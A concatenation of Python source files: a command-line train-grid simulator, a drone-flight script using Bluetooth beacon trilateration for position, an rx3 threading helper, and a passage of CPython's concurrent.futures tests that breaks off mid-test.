dirs = { "north" : 0, "east" : 1, "south" : 2 , "west" : 3}
tupleArgs = arg.split()
row = int(tupleArgs[0])
col = int(tupleArgs[1])
entdir = (tupleArgs[2])
if(not globalGrid):
print("Please create a grid before hand.")
return
cell = globalGrid.grid[row][col]
if(entdir in dirs.keys()):
if(cell.visuals == '_'):
print("Opps, there is no cell element in that position.")
return
else:
stopTime = cell.getStop(dirs[entdir])
print("stop at cell", (row,col), "for: ", stopTime, "secs")
return
else:
print("Please enter a valid direction.")
return
def do_getstatus(self,args):
'''
Returns the status of the train if there is one in the given cell.
Usage: getstatus row col Exp: getstatus 0 0
'''
global globalGrid
global train
tupleArgs = args.split()
row = int(tupleArgs[0])
col = int(tupleArgs[1])
if(not globalGrid):
print("Please create a grid before hand.")
return
cell = globalGrid.grid[row][col]
if(cell.visuals == '_'):
print("There is no such a cell.")
else:
if(globalGrid.hasTrain(row,col)):
status = train.getStatus()
print(status)
else:
print("The train is not in this cell. Please find it first!")
return
def do_rotate(self, arg):
'''
Usage: rotate rotationCount(int) row col, exp: rotate 2 1 0 to rotate cell at row=1 col =0 180 degrees CW
'''
global globalGrid,isDirty
tupleArgs = arg.split()
rotCount = int(tupleArgs[0])
row = int(tupleArgs[1])
col = int(tupleArgs[2])
if(not globalGrid):
print("Please create a grid before hand.")
return
cell = globalGrid.grid[row][col]
cell.setOrientation(rotCount)
# now rotate the visuals as well
isDirty = True
def do_entercell(self, arg):
'''
Create and place train at given row col with wagoncount many wagons. Cannot create on empty tiles
entdir is used to determine which side of the tile the train is. Not visually visible as of now.'
Usage: createtrain row col wagoncount entdir. Exp: entercell 0 0 2 north
'''
global globalGrid, trainPosRow, trainPosCol, isDirty, train
dirs = { "north" : 0, "east" : 1, "south" : 2 , "west" : 3}
args = arg.split()
row = int(args[0])
col = int(args[1])
wagonCount = (int)(args[2])
entdir = (args[3])
if(not globalGrid):
print("Please create a grid before hand.")
return
if(globalGrid.grid[row][col].visuals == '_'):
print("Can not spawn on empty tile.")
return
# TODO: lock train mutex
train = globalGrid.spawnTrain(wagonCount, row, col)
train.enterCell(globalGrid.grid[row][col], dirs[entdir])
trainPosRow, trainPosCol = train.getEnginePos()
# unlock train mutex
isDirty = True
return
def do_advancetrain(self, arg):
'''
Advance the train using its current cell and dir, entercell must be used first.
Train disappears if out of bounds, empty tile or unconnected road'
Usage: advancetrain
'''
global globalGrid, trainPosRow, trainPosCol, isDirty, train
# currCell = globalGrid.grid[train.enginePosRow][train.enginePosCol]
# nextCell = currCell.nextCell(dirs[entdir])
# needs mutex sync
if(not globalGrid):
print("Please create a grid before hand.")
return
canMove = train.advance()
if(canMove == False):
trainPosRow = -1
trainPosCol = -1
print("either unconnected, empty or out of bounds cell. Train will disappear")
else:
trainPosRow, trainPosCol = train.getEnginePos()
# needs mutex sync
isDirty = True
return
def do_getnextcell(self,arg):
'''
It prints the coordinates as row col and the type of the nextcell through entdir.
Usage: row col coordinates of currentcell, entdir for nextcell. Exp: 0 0 north
'''
dirs = { "north" : 0, "east" : 1, "south" : 2 , "west" : 3}
tupleArgs = arg.split()
global globalGrid
row = int(tupleArgs[0])
col = int(tupleArgs[1])
entdir = tupleArgs[2]
if(not globalGrid):
print("Please create a grid before hand.")
return
next = globalGrid.grid[row][col].nextCell(dirs[entdir])
if(next is None):
print("You are trying to access out of the bounds. There is nothing but uncertainty.")
else:
print(next.row, next.col, type(next))
def do_changeswitchstate(self, arg):
'''
It changes the state of the switch in order. Every call actives the next part according to CW.
Usage: row col, Exp: 0 0
'''
# it gets the next state, the default state is the regular road. It follows the CW order.
tupleArgs = arg.split()
global globalGrid
row = int(tupleArgs[0])
col = int(tupleArgs[1])
if(not globalGrid):
print("Please create a grid before hand.")
return
cell = globalGrid.grid[row][col]
if(isinstance(cell, lib.SwitchRoad)):
cell.switchState()
print(cell.activePiece.visuals)
else:
print("The switch you are looking for is not here, please try again.")
return
def do_removeelm(self, arg):
'''
Replace cell with background cell at given row col. Exp: removeelm 1 2
'''
tupleArgs = parse(arg)
global globalGrid, isDirty
if(not globalGrid):
print("Please create a grid before hand.")
return
if(tupleArgs[0] < 0 or tupleArgs[0] >= globalGrid.row or tupleArgs[1] < 0 or tupleArgs[1] >= globalGrid.col):
print("Not existing cell!")
return
if(globalGrid.grid[tupleArgs[0]][tupleArgs[1]].visuals == '_'):
print("You cannot remove the background")
return
globalGrid.removeElement(tupleArgs[0], tupleArgs[1])
isDirty = True
def do_creategrid(self, arg):
'''
Create grid row x col. Exp: creategrid 3 4
**Note: Max displayable grid size is 5x9 due to image & screen size.
'''
#grid size can be 5 row*9 columns at most because of the screen limitations.
tupleArgs = parse(arg)
global globalGrid
if(tupleArgs[0] <=0 or tupleArgs[1] <= 0):
print("Sorry I can't print the nothingness :(")
return
if(tupleArgs[0] > 5 or tupleArgs[1] > 9):
print("Sorry, the municipilaty of screen does not allow us to built such a large structure :(")
return
globalGrid = lib.GameGrid(tupleArgs[0], tupleArgs[1])
def do_addelm(self, arg):
'''
It adds the given element at the given position.
Usage: addelm row col typeOfCell
typeOfCell(string): regular, switch1, switch2, switch3, bridge, levelcrossing, leftTurn, rightTurn, station
row,col (ints) are cell position. top left is row=0,col=0
Exp: addelm 0 0 regular
'''
splitArgs = arg.split()
row = int(splitArgs[0])
col = int(splitArgs[1])
typeStr = splitArgs[2]
global globalGrid
if(globalGrid is None):
print("Please first create a grid.")
return
if(row < 0 or row >= globalGrid.row or col < 0 or col >= globalGrid.col):
print("Please provide appropriate positions.")
return
newElm = None
if(typeStr == "regular"):
newElm = lib.RegularRoad(True, globalGrid)
elif(typeStr == "switch1"):
newElm = lib.SwitchRoad(1, globalGrid)
elif(typeStr == "switch2"):
newElm = lib.SwitchRoad(2, globalGrid)
elif(typeStr == "switch3"):
newElm = lib.SwitchRoad(3, globalGrid)
elif(typeStr == "bridge"):
newElm = lib.BridgeCrossing(globalGrid)
elif(typeStr == "levelcrossing"):
newElm= lib.LevelCrossing(globalGrid)
elif(typeStr == "leftturn"):
newElm = lib.RegularRoad(False, globalGrid)
newElm.makeLeftTurn()
elif(typeStr == "rightturn"):
newElm = lib.RegularRoad(False,globalGrid)
elif(typeStr == "station"):
newElm = lib.Station(globalGrid)
else:
print("typeOfCell(string) argument is invalid. Abort.")
return
globalGrid.addElement(newElm, row, col)
global isDirty
isDirty = True
def do_display(self, arg):
'''
Display the grid. You can follow the cahnges as long as you don\'t quit.
Please close the screen using stopdisplay command or use bye command the quit the shell.
'''
global globalGrid
if(globalGrid == None):
print("Please cretae a grid first.")
return
global isDisplaying, displayThread,tell
if(isDisplaying == False):
displayThread = th.Thread(target= pygameDisplay, args=("adim emre", globalGrid.row, globalGrid.col))
displayThread.start()
isDisplaying = True
else:
if(tell):
print("display thread is already active. change windows")
def do_stopdisplay(self, arg):
'''
Stop the display and close the window. You can still use the commandline.
'''
global stopDisplay, isDisplaying, displayThread
if(isDisplaying == False):
return
# Display thread is monitoring this global flag to exit its inf loop.
if(displayThread is not None):
print("waiting for display thread to close.")
stopDisplay = True
displayThread.join()
isDisplaying = False
stopDisplay = False
print("display thread stopped. done")
def do_bye(self, arg):
'''
Close the trainSim window, and exit: BYE
'''
self.do_stopdisplay(arg)
print('Thank you for playing with trains! We hope you had fun :D')
self.close()
#bye()
return True
def precmd(self, line):
line = line.lower()
if self.file and 'playback' not in line:
print(line, file=self.file)
return line
def close(self):
if self.file:
self.file.close()
self.file = None
def parse(arg):
'Convert a series of zero or more numbers to an argument tuple'
return tuple(map(int, arg.split()))
if __name__ == '__main__':
TrainSimCell().cmdloop() |
main_script.py | # -*- coding: utf-8 -*-
"""
Created on Thu Dec 12 09:16:45 2019
@author: pepo
"""
import libardrone
#import pygame
from time import sleep
import time
import cv2
import matplotlib
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
from threading import Thread
import os
import math
from shapely.geometry import LineString
from shapely.geometry import Point
from bluepy.btle import DefaultDelegate, Peripheral, Scanner
import seaborn as sns
import warnings
warnings.filterwarnings("ignore")
debug=True
drone = libardrone.ARDrone()
ds_test = pd.DataFrame()
ds_oper = pd.DataFrame()
p = Point(0,0)
running = True
route={'p0':Point(0,0),'p1':Point(1,0),'p2':Point(1,1)}
class ScanDelegate(DefaultDelegate):
def __init__(self):
DefaultDelegate.__init__(self)
def handleDiscovery(self, dev, isNewDev, isNewData):
"""if isNewDev:
print ("Discovered device", dev.addr)
elif isNewData:
print ("Received new data from", dev.addr)
"""
def handleNotification(self, cHandle, data):
print(data)
def line_intersection(line1, line2):
xdiff = (line1[0][0] - line1[1][0], line2[0][0] - line2[1][0])
ydiff = (line1[0][1] - line1[1][1], line2[0][1] - line2[1][1])
def det(a, b):
return a[0] * b[1] - a[1] * b[0]
div = det(xdiff, ydiff)
if div == 0:
raise Exception('lines do not intersect')
d = (det(*line1), det(*line2))
x = det(d, xdiff) / div
y = det(d, ydiff) / div
return x, y
def setble(x,y,radius,clr):
return plt.Circle((x,y),radius,fc="none",edgecolor=clr)
def returnpoint(x0,y0,r0,x1,y1,r1,x2,y2,r2):
result=calculateintersection(x0,y0,r0,x1,y1,r1)
result2=calculateintersection(x0,y0,r0,x2,y2,r2)
result3=calculateintersection(x1,y1,r1,x2,y2,r2)
if debug:
print("Intersection 0/1")
print(result)
print("Intersection 0/2")
print(result2)
print("Intersection 1/2")
print(result3)
time.sleep(5)
point=None
if len(result) > 0:
if len(result2) > 0:
message="case A: Circle 0&1 & 0&2 intersect"
point_int=line_intersection([(result[0],result[1]), (result[2],result[3])], [(result2[0],result2[1]), (result2[2],result2[3])])
point=Point(point_int[0],point_int[1])
elif len(result3) > 0:
message="case B: Circle 0&1 & 1&2 intersect"
point_int=line_intersection([(result[0],result[1]), (result[2],result[3])], [(result3[0],result3[1]), (result3[2],result3[3])])
point=Point(point_int[0],point_int[1])
else:
message="case G: Circle 0&1 intersect"
point=Point((result[0]+result[2])/2,(result[1]+result[3])/2)
elif len(result3) > 0 and len(result2) > 0:
message="case C: Circle 0&1 & 1&2 intersect"
point_int=line_intersection([(result2[0],result2[1]), (result2[2],result2[3])], [(result3[0],result3[1]), (result3[2],result3[3])])
point=Point(point_int[0],point_int[1])
elif len(result3) > 0:
message="case D: Circle 1&2 intersect: Medium point"
point=Point((result3[0]+result3[2])/2,(result3[1]+result3[3])/2)
elif len(result2) > 0:
message="case E: Circle 0&2 intersect: Medium point"
point=Point((result2[0]+result2[2])/2,(result2[1]+result2[3])/2)
else:
message="case F: No intersection ERROR no signal"
point=Point(0,0)
#x = np.linspace(0, 1, 100000)
"""fig, ax = plt.subplots(figsize=(12, 10))
plt.grid(linestyle='--')
ax.set_aspect(1)
ax.add_artist(setble(x0,y0,r0,"r")) # Beacon1
ax.add_artist(setble(x1,y1,r1,"g")) # Beacon2
ax.add_artist(setble(x2,y2,r2,"b")) # Beacon3
if len(result) >0:
ax.add_artist(setble(result[0],result[1],0.01,"b")) # Samsung
ax.add_artist(setble(result[2],result[3],0.01,"b")) # Samsung
if len(result2) >0:
ax.add_artist(setble(result2[0],result2[1],0.01,"b")) # Samsung
ax.add_artist(setble(result2[2],result2[3],0.01,"b")) # Samsung
if len(result3) >0:
ax.add_artist(setble(result3[0],result3[1],0.01,"b")) # Samsung
ax.add_artist(setble(result3[2],result3[3],0.01,"b")) # Samsung
ax.add_artist(setble(point.x,point.y,0.01,"r"))
"""
if debug:
print(message)
return point
def calculateintersection(x0,y0,r0,x1,y1,r1):
EPSILON = 0.000001;
dx = x1-x0
dy = y1-y0
d=math.sqrt((dy*dy)+(dx*dx))
if d>r0+r1:
return []
if d < abs(r0-r1):
return []
a = ((r0*r0) - (r1*r1) + (d*d)) / (2.0 * d)
point2_x = x0 + (dx * a/d)
point2_y = y0 + (dy * a/d)
h = math.sqrt((r0*r0) - (a*a))
rx = -dy * (h/d)
ry = dx * (h/d)
intersectionPoint1_x = point2_x + rx
intersectionPoint2_x = point2_x - rx
intersectionPoint1_y = point2_y + ry
intersectionPoint2_y = point2_y - ry
return [intersectionPoint1_x,intersectionPoint1_y,intersectionPoint2_x,intersectionPoint2_y]
def inverse(x):
return x*(-1)
def get_current_position():
MIN=30
MAX=100
SCALE=1.3
scanner = Scanner().withDelegate(ScanDelegate())
devices = scanner.scan(1.9)
devlist=['30:ae:a4:9c:e7:c2','30:ae:a4:97:6c:26','30:ae:a4:9c:8f:a2']
global ds_test
for dev in devices:
if dev.addr in devlist:
# print("ADDR: %s" % (dev.addr))
data = [[time.time(),dev.addr,-1*dev.rssi,dev.iface,dev.addrType,dev.getValueText(1),dev.getValueText(10),dev.getValueText(255)]]
#data = [[time.time()]]
ds_test=ds_test.append(data)
#print("bucle: %d" % len(ds_test))
if len(ds_test) == 0:
return None
# else:
# print("bucle: %d" % (len(ds_test[ds_test[2]>=MIN])))
# print("bucle2: %d" % len(ds_test))
# return None
ds_test=ds_test[ds_test[2]>=MIN]
if debug:
print("bucle2: %d" % len(ds_test))
print(len(ds_test[ds_test[0]-(time.time())<2000]))
#ds_test["rssi_norm"]=MAX-ds_test[2]
ds_test["rssi_norm"]=(ds_test[2]-MIN)/(MAX-MIN)
#ds_test["rssi_norm"]=1-ds_test["rssi_norm"]
ds_test["rssi_norm"]=ds_test["rssi_norm"]*SCALE
ds_test_b3=ds_test[ds_test[1]=="30:ae:a4:97:6c:26"] # 3
ds_test_b1=ds_test[ds_test[1]=="30:ae:a4:9c:e7:c2"] # 1
ds_test_b2=ds_test[ds_test[1]=="30:ae:a4:9c:8f:a2"] # 2
ds_b1 = 0
ds_b2 = 0
ds_b3 = 0
if len(ds_test_b1) > 0 and time.time()-ds_test_b1.iloc[-1][0] < 10:
ds_b1 = ds_test_b1.iloc[-1]["rssi_norm"]
if len(ds_test_b2) > 0 and time.time()-ds_test_b2.iloc[-1][0] < 10:
ds_b2 = ds_test_b2.iloc[-1]["rssi_norm"]
if len(ds_test_b3) > 0 and time.time()-ds_test_b3.iloc[-1][0] < 10 :
ds_b3 = ds_test_b3.iloc[-1]["rssi_norm"]
print("Beacon 1: %s" % (ds_b1))
print("Beacon 2: %s" % (ds_b2))
print("Beacon 3: %s" % (ds_b3))
if debug:
print("Summary:")
print("#########")
print("len ds_test %d" % (len(ds_test)))
print(ds_b1)
print(ds_b2)
print(ds_b3)
print("#########")
print("Position 1: %s" % (ds_b1))
print("Position 2: %s" % (ds_b2))
print("Position 3: %s" % (ds_b3))
point=returnpoint(0,0,ds_b1,0,1,ds_b2,1,0.5,ds_b3)
if point == None:
point = Point(0,0)
data = [[time.time()*1000,str(point.x),str(point.y),0,0,ds_b1,0,1,ds_b2,1,0.5,ds_b3]]
temp = pd.DataFrame(data)
temp.to_csv('/home/pepo/Documents/nissan_code/Loc_csv.csv',mode='a', header=False)
return point
def get_info():
print('Battery %i%%' % drone.navdata.get(0,dict()).get('battery',0))
print('State %i' % drone.navdata.get(0,dict()).get('ctrl_state',0))
print('Theta %i' % drone.navdata.get(0,dict()).get('theta',0))
print('Phi %i' % drone.navdata.get(0,dict()).get('phi',0))
print('PSI %i' % drone.navdata.get(0,dict()).get('psi',0))
print('Altitude %i' % drone.navdata.get(0,dict()).get('altitude',0))
print('vx %i' % drone.navdata.get(0,dict()).get('vx',0))
print('vy %i' % drone.navdata.get(0,dict()).get('vy',0))
print('vz %i' % drone.navdata.get(0,dict()).get('vz',0))
def get_detail(name):
return drone.navdata.get(0,dict()).get(name,0)
def takeoff(height):
drone.takeoff()
def move_left(secs):
drone.move_left()
sleep(secs)
def move_right(secs):
drone.move_right()
sleep(secs)
def turn_right(secs):
drone.turn_right()
sleep(secs)
def turn_left(secs):
drone.turn_left()
sleep(secs)
def move_ff(secs):
drone.move_forward()
sleep(secs)
def move_back(secs):
drone.move_backward()
sleep(secs)
def move_up(secs):
drone.move_up()
sleep(secs)
def move_down(secs):
drone.move_down()
sleep(secs)
def threadlocation(threadname):
global p
global running
while running:
p = get_current_position()
if debug:
print(p)
if p == None:
p = Point(0,0)
os._exit(0)
def main():
global running
cam = cv2.VideoCapture('tcp://192.168.1.1:5555')
#drone = libardrone.ARDrone()
drone.takeoff()
while running:
# get current frame of video
running, frame = cam.read()
str_image = ("Location: X(%s) , Y(%s) \n Battery: %s \n Height: %s" % (str(round(p.x,2)),str(round(p.y,2)),str(get_detail('battery')),str(get_detail('altitude'))))
font=cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(frame,str_image,(0,30),font,0.5,(0,255,0),1,cv2.LINE_AA,bottomLeftOrigin=False)
#print(get_current_position())
if running:
cv2.imshow('frame', frame)
if cv2.waitKey(1) & 0xFF == 27:
# escape key pressed
running = False
print("Exit requested")
else:
# error reading frame
print ('error reading video feed')
drone.land()
cam.release()
cv2.destroyAllWindows()
os._exit(0)
def inittrack():
THRESHOLD=0.002
global p
global ds_oper
items=len(route)
i=0
while i<items:
name = 'p'+str(i)
target = route[name]
print("Situation")
print("Target X: %s Y: %s" % (str(target.x),str(target.y)))
print("Position X: %s Y: %s" % (str(p.x),str(p.y)))
print("Distance:")
print("X: %s Y: %s" % (str(p.x-target.x),str(p.y-target.y)))
a=p.x-target.x
b=p.y-target.y
op=""
if abs(a)<THRESHOLD and abs(b)<THRESHOLD:
i=i+1
print("point found")
if a>0:
op=op+"B"
print("move backwards")
else:
op=op+"F"
print("move forwards")
if b<0:
op=op+"R"
print("move right")
else:
op=op+"L"
print("move left")
data = [[time.time()*1000,str(target.x),str(target.y),str(p.x),str(p.y),op]]
temp = pd.DataFrame(data)
# temp.to_csv('/home/pepo/Documents/nissan_code/Loc_csv.csv',mode='a', header=False)
time.sleep(2)
if __name__ == '__main__':
try:
drone.trim()
drone.speed = 0.2
if False:
thread_loc = Thread(target=threadlocation, args=['t1'])
thread_loc.start()
if False:
thread_main = Thread(target=main, args=[])
thread_main.start()
# inittrack()
print("take off")
drone.takeoff()
sleep(5)
print("move up")
drone.move_up()
sleep(5)
print("move left")
drone.move_left()
sleep(3)
print("hover")
drone.hover()
sleep(1)
print("move down")
drone.move_down()
sleep(5)
print("move right")
drone.move_right()
sleep(3)
print("hover")
drone.hover()
sleep(1)
# sleep(1)
print("land")
drone.land()
except (SystemExit,KeyboardInterrupt):
drone.land()
drone.halt()
print("Dron Aborted")
except:
drone.land()
drone.halt()
print("Dron Exception Aborted")
drone.halt() |
concurrency.py | from threading import Thread
from rx3.core.typing import StartableTarget
def default_thread_factory(target: StartableTarget) -> Thread:
return Thread(target=target, daemon=True)
def synchronized(lock):
"""A decorator for synchronizing access to a given function."""
def wrapper(fn):
def inner(*args, **kw):
with lock:
return fn(*args, **kw)
return inner
return wrapper
|
test_concurrent_futures.py | import test.support
# Skip tests if _multiprocessing wasn't built.
test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
test.support.import_module('threading')
from test.support.script_helper import assert_python_ok
import os
import sys
import threading
import time
import unittest
import weakref
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future)
from concurrent.futures.process import BrokenProcessPool
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
def mul(x, y):
return x * y
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
class MyObject(object):
def my_method(self):
pass
class ExecutorMixin:
worker_count = 5
def setUp(self):
self.t1 = time.time()
try:
self.executor = self.executor_type(max_workers=self.worker_count)
except NotImplementedError as e:
self.skipTest(str(e))
self._prime_executor()
def tearDown(self):
self.executor.shutdown(wait=True)
dt = time.time() - self.t1
if test.support.verbose:
print("%.2fs" % dt, end=' ')
self.assertLess(dt, 60, "synchronization issue: test lasted too long")
def _prime_executor(self):
# Make sure that the executor is ready to do work before running the
# tests. This should reduce the probability of timeouts in the tests.
futures = [self.executor.submit(time.sleep, 0.1)
for _ in range(self.worker_count)]
for f in futures:
f.result()
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
class ExecutorShutdownTest:
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import {executor_type}
from time import sleep
from test.test_concurrent_futures import sleep_and_print
t = {executor_type}(5)
t.submit(sleep_and_print, 1.0, "apple")
""".format(executor_type=self.executor_type.__name__))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), b"apple")
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, unittest.TestCase):
def _prime_executor(self):
pass
def test_threads_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._threads), 3)
self.executor.shutdown()
for t in self.executor._threads:
t.join()
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join()
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
test.support.gc_collect()
for t in threads:
t.join()
class ProcessPoolShutdownTest(ProcessPoolMixin, ExecutorShutdownTest, unittest.TestCase):
def _prime_executor(self):
pass
def test_processes_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._processes), 5)
processes = self.executor._processes
self.executor.shutdown()
for p in processes.values():
p.join()
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(max_workers=5) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes.values():
p.join()
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(max_workers=5)
list(executor.map(abs, range(-5, 5)))
queue_management_thread = executor._queue_management_thread
processes = executor._processes
del executor
test.support.gc_collect()
queue_management_thread.join()
for p in processes.values():
p.join()
class WaitTests:
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5)
future3 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 6)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, unittest.TestCase):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
newgil = hasattr(sys, 'getswitchinterval')
if newgil:
geti, seti = sys.getswitchinterval, sys.setswitchinterval
else:
geti, seti = sys.getcheckinterval, sys.setcheckinterval
oldinterval = geti()
seti(1e-6 if newgil else 1)
try:
fs = {self.executor.submit(future_func) for i in range(100)}
event.set()
futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
seti(oldinterval)
class ProcessPoolWaitTests(ProcessPoolMixin, WaitTests, unittest.TestCase):
pass
class AsCompletedTests:
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
future1 = self.executor.submit(time.sleep, 2)
completed = [f for f in futures.as_completed([future1,future1])]
self.assertEqual(len(completed), 1)
class ThreadPoolAsCompletedTests(ThreadPoolMixin, AsCompletedTests, unittest.TestCase):
pass
class ProcessPoolAsCompletedTests(ProcessPoolMixin, AsCompletedTests, unittest.TestCase):
pass
class ExecutorTest:
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(i.__next__(), (0, 1))
self.assertEqual(i.__next__(), (0, 1))
self.assertRaises(ZeroDivisionError, i.__next__)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 6],
timeout=5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_shutdown_race_issue12456(self):
# Issue #12456: race condition at shutdown where trying to post a
# sentinel in the call queue blocks (the queue is full while processes
# have exited).
self.executor.map(str, [2] * (self.worker_count + 1))
self.executor.shutdown()
@test.support.cpython_only
def test_no_stale_references(self):
# Issue #16284: check that the executors don't unnecessarily hang onto
# references.
my_object = MyObject()
my_object_collected = threading.Event()
my_object_callback = weakref.ref(
my_object, lambda obj: my_object_collected.set())
# Deliberately discarding the future.
self.executor.submit(my_object.my_method)
del my_object
collected = my_object_collected.wait(timeout=5.0)
self.assertTrue(collected,
"Stale reference not collected within timeout.")
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaisesRegex(ValueError,
"max_workers must be greater "
"than 0"):
self.executor_type(max_workers=number)
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, unittest.TestCase):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
finished.append(n)
self.executor.map(record_finished, range(10))
